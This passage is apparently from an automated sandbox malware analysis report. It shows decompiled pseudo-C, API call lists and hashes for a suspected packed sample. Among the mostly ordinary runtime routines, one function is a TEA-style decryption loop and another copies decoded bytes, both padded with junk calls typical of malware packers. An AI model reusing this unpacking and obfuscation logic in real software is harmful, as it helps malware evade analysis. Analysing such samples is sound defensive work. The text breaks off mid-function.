                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: dab3f9df0873dbb66d59a1ffd7a7cdb8e3d00ab1e86608c3963ad7d201bd37d4
                    • Instruction ID: 7889757c789c7da0a890e7b76dcd0c4e6123f9f17385902fb7df80ec0326ffa1
                    • Opcode Fuzzy Hash: dab3f9df0873dbb66d59a1ffd7a7cdb8e3d00ab1e86608c3963ad7d201bd37d4
                    • Instruction Fuzzy Hash: D5D05E36994349AADB015F75BD08B263BDC9398396F148436B90CC6290E574D980A645
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 127 406805-406807 call 406793 129 40680c-40680d 127->129
                    C-Code - Quality: 100%
                    			E00406805() {
                    				void* _t1;
                    
                    				_t1 = E00406793(0); // executed
                    				return _t1;
                    			}




                    0x00406807
                    0x0040680d

                    APIs
                    • __encode_pointer.LIBCMT ref: 00406807
                      • Part of subcall function 00406793: TlsGetValue.KERNEL32(00000000,?,0040680C,00000000,0040A2DB,0057A210,00000000,00000314,?,00407573,0057A210,Microsoft Visual C++ Runtime Library,00012010), ref: 004067A5
                      • Part of subcall function 00406793: TlsGetValue.KERNEL32(00000004,?,0040680C,00000000,0040A2DB,0057A210,00000000,00000314,?,00407573,0057A210,Microsoft Visual C++ Runtime Library,00012010), ref: 004067BC
                      • Part of subcall function 00406793: RtlEncodePointer.NTDLL(00000000,?,0040680C,00000000,0040A2DB,0057A210,00000000,00000314,?,00407573,0057A210,Microsoft Visual C++ Runtime Library,00012010), ref: 004067FA
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: Value$EncodePointer__encode_pointer
                    • String ID:
                    • API String ID: 2585649348-0
                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction ID: f33416d72701d6d2040f3587bf452106a3c5ced27a51013427c5c41c92882c51
                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00404C9B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v804;
                    				intOrPtr _v808;
                    				intOrPtr _v812;
                    				intOrPtr _t6;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				long _t17;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr* _t31;
                    				void* _t34;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ecx;
                    				_t21 = __ebx;
                    				_t6 = __eax;
                    				_t34 = _t22 -  *0x41fadc; // 0x9f468eeb
                    				if(_t34 == 0) {
                    					asm("repe ret");
                    				}
                    				 *0x57a740 = _t6;
                    				 *0x57a73c = _t22;
                    				 *0x57a738 = _t25;
                    				 *0x57a734 = _t21;
                    				 *0x57a730 = _t27;
                    				 *0x57a72c = _t26;
                    				 *0x57a758 = ss;
                    				 *0x57a74c = cs;
                    				 *0x57a728 = ds;
                    				 *0x57a724 = es;
                    				 *0x57a720 = fs;
                    				 *0x57a71c = gs;
                    				asm("pushfd");
                    				_pop( *0x57a750);
                    				 *0x57a744 =  *_t31;
                    				 *0x57a748 = _v0;
                    				 *0x57a754 =  &_a4;
                    				 *0x57a690 = 0x10001;
                    				_t11 =  *0x57a748; // 0x0
                    				 *0x57a644 = _t11;
                    				 *0x57a638 = 0xc0000409;
                    				 *0x57a63c = 1;
                    				_t12 =  *0x41fadc; // 0x9f468eeb
                    				_v812 = _t12;
                    				_t13 =  *0x41fae0; // 0x60b97114
                    				_v808 = _t13;
                    				 *0x57a688 = IsDebuggerPresent();
                    				_push(1);
                    				E00409156(_t14);
                    				SetUnhandledExceptionFilter(0);
                    				_t17 = UnhandledExceptionFilter(0x401aa4);
                    				if( *0x57a688 == 0) {
                    					_push(1);
                    					E00409156(_t17);
                    				}
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}



















                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404ca1
                    0x00404ca3
                    0x00404ca3
                    0x00407f83
                    0x00407f88
                    0x00407f8e
                    0x00407f94
                    0x00407f9a
                    0x00407fa0
                    0x00407fa6
                    0x00407fad
                    0x00407fb4
                    0x00407fbb
                    0x00407fc2
                    0x00407fc9
                    0x00407fd0
                    0x00407fd1
                    0x00407fda
                    0x00407fe2
                    0x00407fea
                    0x00407ff5
                    0x00407fff
                    0x00408004
                    0x00408009
                    0x00408013
                    0x0040801d
                    0x00408022
                    0x00408028
                    0x0040802d
                    0x00408039
                    0x0040803e
                    0x00408040
                    0x00408048
                    0x00408053
                    0x00408060
                    0x00408062
                    0x00408064
                    0x00408069
                    0x0040807d

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 00408033
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00408048
                    • UnhandledExceptionFilter.KERNEL32(00401AA4), ref: 00408053
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0040806F
                    • TerminateProcess.KERNEL32(00000000), ref: 00408076
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: 4fa1a9469513844494454f541b438840b5b47cfb6bec8d8128682c8d81ac2bda
                    • Instruction ID: 7f4b5c58c0784c1be33984ccd037a44821b10b4127e1c48174b1abfaa85dd263
                    • Opcode Fuzzy Hash: 4fa1a9469513844494454f541b438840b5b47cfb6bec8d8128682c8d81ac2bda
                    • Instruction Fuzzy Hash: 2721F3B49012049FDB18DF25F9896483BB0FBAC352F51502AE50D973B0E7B859C9BF4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E004030EB(unsigned int* _a4, signed int _a8) {
                    				unsigned int _v8;
                    				intOrPtr _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				void* _v48;
                    				long _v52;
                    				char _v56;
                    				long _v60;
                    				long _v64;
                    				long _v68;
                    				long _v72;
                    				long _v76;
                    				char _v1100;
                    				char _v2124;
                    				char _v3148;
                    				void _v5196;
                    				unsigned int* _t61;
                    				intOrPtr* _t63;
                    				unsigned int* _t79;
                    				unsigned int _t102;
                    				unsigned int _t103;
                    				unsigned int _t104;
                    				signed int _t113;
                    				signed int _t114;
                    				signed int _t116;
                    				signed int _t117;
                    
                    				E00404450(0x1448);
                    				_t61 = _a4;
                    				_t104 =  *_t61;
                    				_v16 = _t61[1];
                    				_t63 = _a8;
                    				_v32 =  *_t63;
                    				_v36 =  *((intOrPtr*)(_t63 + 4));
                    				_v8 = _t104;
                    				_v12 = 0xc6ef3720;
                    				_v28 =  *((intOrPtr*)(_t63 + 8));
                    				_v40 =  *((intOrPtr*)(_t63 + 0xc));
                    				_v24 = 0x20;
                    				do {
                    					_t113 = _t104 << 4;
                    					if( *0x57a190 == 5) {
                    						FindCloseChangeNotification(0);
                    						_t104 = _v8;
                    					}
                    					_t114 = _t113 + _v28;
                    					_a8 = _v12 + _t104;
                    					_t102 = _t104 >> 5;
                    					if( *0x57a190 == 0x1b) {
                    						__imp__FindNextVolumeA(0,  &_v1100, 0);
                    						SetLocaleInfoA(0, 0, "Lopabuz");
                    						SetSystemTimeAdjustment(0, 0);
                    						InterlockedDecrement( &_v60);
                    						LocalFree(0);
                    					}
                    					 *0x574b10 = 0;
                    					_v20 = _t102 + _v40 ^ _a8 ^ _t114;
                    					 *0x574b10 =  *0x574b10 + _v20;
                    					E00403066( &_v16, _t102 + _v40 ^ _a8 ^ _t114);
                    					_t103 = _v16;
                    					_t116 = _t103 << 4;
                    					if( *0x57a190 == 0x78c) {
                    						GetComputerNameA( &_v1100,  &_v52);
                    						GetVolumeInformationA(0,  &_v2124, 0,  &_v76,  &_v64,  &_v68,  &_v3148, 0);
                    						ReadConsoleW(0,  &_v5196, 0,  &_v72, 0);
                    					}
                    					_t117 = _t116 + _v32;
                    					_a8 = _v16 + _v12;
                    					if( *0x57a190 == 0x1be) {
                    						ReadFile(0, 0, 0, 0, 0);
                    						__imp__GetConsoleAliasesW( &_v5196, 0, 0);
                    						_v48 = 0;
                    						_v44 = 0;
                    						__imp__InterlockedPushEntrySList( &_v48,  &_v56);
                    					}
                    					 *0x574b1c =  *0x574b1c | 0xffffffff;
                    					 *0x574b18 = 0xff6b3619;
                    					_v20 = _t117 ^ (_t103 >> 0x00000005) + _v36 ^ _a8;
                    					_v8 = _v8 - _v20;
                    					_v12 = _v12 + 0x61c88647;
                    					_t54 =  &_v24;
                    					 *_t54 = _v24 - 1;
                    					_t104 = _v8;
                    				} while ( *_t54 != 0);
                    				_t79 = _a4;
                    				_t79[1] = _t103;
                    				 *_t79 = _t104;
                    				return _t79;
                    			}



































                    0x004030f3
                    0x004030f8
                    0x004030fb
                    0x00403100
                    0x00403103
                    0x00403108
                    0x0040310f
                    0x0040311a
                    0x0040311d
                    0x00403124
                    0x00403127
                    0x0040312a
                    0x00403133
                    0x00403135
                    0x0040313f
                    0x00403142
                    0x00403148
                    0x00403148
                    0x0040314e
                    0x0040315d
                    0x00403160
                    0x00403162
                    0x0040316d
                    0x0040317a
                    0x00403182
                    0x0040318c
                    0x00403193
                    0x00403193
                    0x004031a2
                    0x004031aa
                    0x004031b0
                    0x004031bb
                    0x004031c0
                    0x004031c5
                    0x004031d2
                    0x004031df
                    0x00403202
                    0x00403216
                    0x00403216
                    0x0040321c
                    0x00403225
                    0x00403232
                    0x00403239
                    0x00403248
                    0x00403256
                    0x00403259
                    0x0040325c
                    0x0040325c
                    0x00403262
                    0x00403271
                    0x00403280
                    0x00403286
                    0x00403289
                    0x00403290
                    0x00403290
                    0x00403293
                    0x00403293
                    0x0040329c
                    0x004032a1
                    0x004032a4
                    0x004032a8

                    APIs
                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00403142
                    • FindNextVolumeA.KERNEL32(00000000,?,00000000), ref: 0040316D
                    • SetLocaleInfoA.KERNEL32(00000000,00000000,Lopabuz), ref: 0040317A
                    • SetSystemTimeAdjustment.KERNEL32 ref: 00403182
                    • InterlockedDecrement.KERNEL32(?), ref: 0040318C
                    • LocalFree.KERNEL32(00000000), ref: 00403193
                    • GetComputerNameA.KERNEL32 ref: 004031DF
                    • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00403202
                    • ReadConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00403216
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403239
                    • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00403248
                    • InterlockedPushEntrySList.KERNEL32(?,?), ref: 0040325C
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: ConsoleFindInterlockedReadVolume$AdjustmentAliasesChangeCloseComputerDecrementEntryFileFreeInfoInformationListLocalLocaleNameNextNotificationPushSystemTime
                    • String ID: $Lopabuz
                    • API String ID: 1472518974-2957910613
                    • Opcode ID: 8c902d01fe6e74f39a0ebfdbec1e0678bfa5b8c66a1aef81708450cfccae457b
                    • Instruction ID: 1b616bbc5b2a2b807360759a0e21ce9bcbbdf60082083dc51710300d4fdb8ff3
                    • Opcode Fuzzy Hash: 8c902d01fe6e74f39a0ebfdbec1e0678bfa5b8c66a1aef81708450cfccae457b
                    • Instruction Fuzzy Hash: B551FA75901218EFCB00CF98D9849DEBBB8FF48314F00816AE519E3260D7349A85DFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E004068FA(intOrPtr __ebx, void* __edi, void* __esi, void* __eflags) {
                    				struct HINSTANCE__* _t23;
                    				intOrPtr _t28;
                    				intOrPtr _t32;
                    				intOrPtr _t45;
                    				void* _t46;
                    
                    				_t35 = __ebx;
                    				_push(0xc);
                    				_push(0x40df10);
                    				E00406E94(__ebx, __edi, __esi);
                    				_t44 = L"KERNEL32.DLL";
                    				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                    				if(_t23 == 0) {
                    					_t23 = E004070CC(_t44);
                    				}
                    				 *(_t46 - 0x1c) = _t23;
                    				_t45 =  *((intOrPtr*)(_t46 + 8));
                    				 *((intOrPtr*)(_t45 + 0x5c)) = 0x401a28;
                    				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                    				if(_t23 != 0) {
                    					_t35 = __imp__GetProcAddress; // 0x76684ee0
                    					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                    					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                    				}
                    				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                    				 *((char*)(_t45 + 0xc8)) = 0x43;
                    				 *((char*)(_t45 + 0x14b)) = 0x43;
                    				 *(_t45 + 0x68) = 0x41fe20;
                    				E004081FA(_t35, 1, 0xd);
                    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                    				InterlockedIncrement( *(_t45 + 0x68));
                    				 *(_t46 - 4) = 0xfffffffe;
                    				E004069CF();
                    				E004081FA(_t35, 1, 0xc);
                    				 *(_t46 - 4) = 1;
                    				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                    				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                    				if(_t28 == 0) {
                    					_t32 =  *0x41fe10; // 0x41fd38
                    					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                    				}
                    				E0040943B( *((intOrPtr*)(_t45 + 0x6c)));
                    				 *(_t46 - 4) = 0xfffffffe;
                    				return E00406ED9(E004069D8());
                    			}








                    0x004068fa
                    0x004068fa
                    0x004068fc
                    0x00406901
                    0x00406906
                    0x0040690c
                    0x00406914
                    0x00406917
                    0x0040691c
                    0x0040691d
                    0x00406920
                    0x00406923
                    0x0040692d
                    0x00406932
                    0x0040693a
                    0x00406942
                    0x00406952
                    0x00406952
                    0x00406958
                    0x0040695b
                    0x00406962
                    0x00406969
                    0x00406972
                    0x00406978
                    0x0040697f
                    0x00406985
                    0x0040698c
                    0x00406993
                    0x00406999
                    0x0040699c
                    0x0040699f
                    0x004069a4
                    0x004069a6
                    0x004069ab
                    0x004069ab
                    0x004069b1
                    0x004069b7
                    0x004069c8

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040DF10,0000000C,00406A35,00000000,00000000,?,?,004055B9,00404E89,00000001,?,00404222,00000001,?), ref: 0040690C
                    • __crt_waiting_on_module_handle.LIBCMT ref: 00406917
                      • Part of subcall function 004070CC: Sleep.KERNEL32(000003E8,?,?,0040685D,KERNEL32.DLL,?,00405AC2,?,00404E83,?,00000001,?,00404222,00000001,?), ref: 004070D8
                      • Part of subcall function 004070CC: GetModuleHandleW.KERNEL32(?,?,?,0040685D,KERNEL32.DLL,?,00405AC2,?,00404E83,?,00000001,?,00404222,00000001,?), ref: 004070E1
                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406940
                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00406950
                    • __lock.LIBCMT ref: 00406972
                    • InterlockedIncrement.KERNEL32(0041FE20), ref: 0040697F
                    • __lock.LIBCMT ref: 00406993
                    • ___addlocaleref.LIBCMT ref: 004069B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL$NhvPhv
                    • API String ID: 1028249917-688579292
                    • Opcode ID: f4697235d05f84fa90c4d611d0ac9856e53c7288727971d13edb9e8f8eec0a3c
                    • Instruction ID: 801cee06352f5f038e5c0e6b58d0008783acce4921ecf755d5d326563760f18f
                    • Opcode Fuzzy Hash: f4697235d05f84fa90c4d611d0ac9856e53c7288727971d13edb9e8f8eec0a3c
                    • Instruction Fuzzy Hash: 6E1163B1900701DAD7209F7AD90175ABBE0AF44318F10853FE49AB66E2CB7C9955CF5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00403304(intOrPtr _a4) {
                    				short _v8;
                    				short _v12;
                    				struct _FILETIME _v20;
                    				struct _OSVERSIONINFOEXW _v304;
                    				short _v2352;
                    				intOrPtr _t10;
                    				intOrPtr _t22;
                    				void* _t25;
                    
                    				if( *0x57a190 == 0x37) {
                    					__imp__GetComputerNameExW(0, 0, 0, _t25);
                    					FindResourceA(0, "Piwatolavibo tetez fey zel fiviyisutocup", "Jakoduhepu lotosaxufedox");
                    					IsBadWritePtr(0, 0);
                    					GlobalGetAtomNameW(0,  &_v2352, 0);
                    					DebugBreak();
                    					FileTimeToDosDateTime( &_v20,  &_v12,  &_v8);
                    					LocalSize(0);
                    					_push(0);
                    					VerifyVersionInfoW( &_v304, 0, 0);
                    				}
                    				_t10 = _a4;
                    				_t22 =  *0x57a194; // 0x40ccda
                    				_t8 = _t10 + 0x38d6; // 0x74c4491a
                    				 *((char*)( *0x574b0c + _t10)) =  *((intOrPtr*)(_t22 + _t8));
                    				return _t10;
                    			}











                    0x00403314
                    0x0040331c
                    0x0040332d
                    0x00403335
                    0x00403344
                    0x0040334a
                    0x0040335c
                    0x00403363
                    0x00403369
                    0x00403373
                    0x00403379
                    0x0040337a
                    0x0040337d
                    0x00403383
                    0x00403390
                    0x00403394

                    APIs
                    • GetComputerNameExW.KERNEL32(00000000,00000000,00000000), ref: 0040331C
                    • FindResourceA.KERNEL32(00000000,Piwatolavibo tetez fey zel fiviyisutocup,Jakoduhepu lotosaxufedox), ref: 0040332D
                    • IsBadWritePtr.KERNEL32(00000000,00000000), ref: 00403335
                    • GlobalGetAtomNameW.KERNEL32 ref: 00403344
                    • DebugBreak.KERNEL32 ref: 0040334A
                    • FileTimeToDosDateTime.KERNEL32 ref: 0040335C
                    • LocalSize.KERNEL32 ref: 00403363
                    • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 00403373
                    Strings
                    • Piwatolavibo tetez fey zel fiviyisutocup, xrefs: 00403327
                    • Jakoduhepu lotosaxufedox, xrefs: 00403322
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: NameTime$AtomBreakComputerDateDebugFileFindGlobalInfoLocalResourceSizeVerifyVersionWrite
                    • String ID: Jakoduhepu lotosaxufedox$Piwatolavibo tetez fey zel fiviyisutocup
                    • API String ID: 913479139-732877841
                    • Opcode ID: bad2ba65ab8759e2046cf4fad9a9f7db396e88697b27d25a0d3d6ac44797c18c
                    • Instruction ID: 32eeebdea68b919497aa8e2dc359b0f51f7b8260f3ccf762548db348a70ffc0b
                    • Opcode Fuzzy Hash: bad2ba65ab8759e2046cf4fad9a9f7db396e88697b27d25a0d3d6ac44797c18c
                    • Instruction Fuzzy Hash: 0D012D764021A8BBC711ABA0ED4CDDF7F6CEF0A351B004062F64AE2161C7385689CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00405E3A(intOrPtr __ecx) {
                    				void* _t47;
                    				intOrPtr _t48;
                    				void* _t53;
                    				void* _t54;
                    				void* _t56;
                    				intOrPtr _t57;
                    				void* _t58;
                    				void* _t61;
                    
                    				_push(0x2c);
                    				_push(0x40de70);
                    				E00406E94(_t47, _t54, _t56);
                    				_t48 = __ecx;
                    				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                    				_t57 =  *((intOrPtr*)(_t58 + 8));
                    				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                    				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                    				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                    				 *((intOrPtr*)(_t58 - 0x28)) = E00404828(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                    				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00406A5A(__ecx, _t53, _t61) + 0x88));
                    				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00406A5A(_t48, _t53, _t61) + 0x8c));
                    				 *((intOrPtr*)(E00406A5A(_t48, _t53, _t61) + 0x88)) = _t57;
                    				 *((intOrPtr*)(E00406A5A(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                    				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                    				 *(_t58 - 4) = 1;
                    				 *((intOrPtr*)(_t58 - 0x1c)) = E004048CD(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                    				 *(_t58 - 4) = 0xfffffffe;
                    				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                    				E00405F60(_t48, _t55, _t57);
                    				return E00406ED9( *((intOrPtr*)(_t58 - 0x1c)));
                    			}











                    0x00405e3a
                    0x00405e3c
                    0x00405e41
                    0x00405e46
                    0x00405e48
                    0x00405e4b
                    0x00405e4e
                    0x00405e51
                    0x00405e58
                    0x00405e69
                    0x00405e77
                    0x00405e85
                    0x00405e8d
                    0x00405e9b
                    0x00405ea1
                    0x00405ea8
                    0x00405eab
                    0x00405ec1
                    0x00405ec4
                    0x00405f39
                    0x00405f40
                    0x00405f47
                    0x00405f54

                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 00405E62
                      • Part of subcall function 00404828: __getptd.LIBCMT ref: 00404836
                      • Part of subcall function 00404828: __getptd.LIBCMT ref: 00404844
                    • __getptd.LIBCMT ref: 00405E6C
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 00405E7A
                    • __getptd.LIBCMT ref: 00405E88
                    • __getptd.LIBCMT ref: 00405E93
                    • _CallCatchBlock2.LIBCMT ref: 00405EB9
                      • Part of subcall function 004048CD: __CallSettingFrame@12.LIBCMT ref: 00404919
                      • Part of subcall function 00405F60: __getptd.LIBCMT ref: 00405F6F
                      • Part of subcall function 00405F60: __getptd.LIBCMT ref: 00405F7D
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: 0816b11dbc3b11961b895392edaa66ac719ec553376946b1842d046d2c3400bc
                    • Instruction ID: a00ff4abe10f4448a2df6e401e12ef023c083e9201f2ef0526b270d896a2f970
                    • Opcode Fuzzy Hash: 0816b11dbc3b11961b895392edaa66ac719ec553376946b1842d046d2c3400bc
                    • Instruction Fuzzy Hash: E01126B1D00209DFDB00EFA1C445AAE7BB1FF08319F11857AF815B7291DB389A119F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00404496(char _a4) {
                    				signed int _v16;
                    				char _v20;
                    				long _v24;
                    				signed int _v32;
                    				void* _v36;
                    				long _v40;
                    				void _v60;
                    				void* __edi;
                    				void* _t20;
                    				signed int _t21;
                    				signed int _t26;
                    				DWORD* _t27;
                    				void* _t30;
                    				signed int _t34;
                    				void* _t38;
                    
                    				while(1) {
                    					_t2 =  &_a4; // 0x4039e2
                    					_t20 = E00404DCA(_t30, _t38,  *_t2);
                    					if(_t20 != 0) {
                    						break;
                    					}
                    					_t21 = E00405AB2(_a4);
                    					__eflags = _t21;
                    					if(_t21 == 0) {
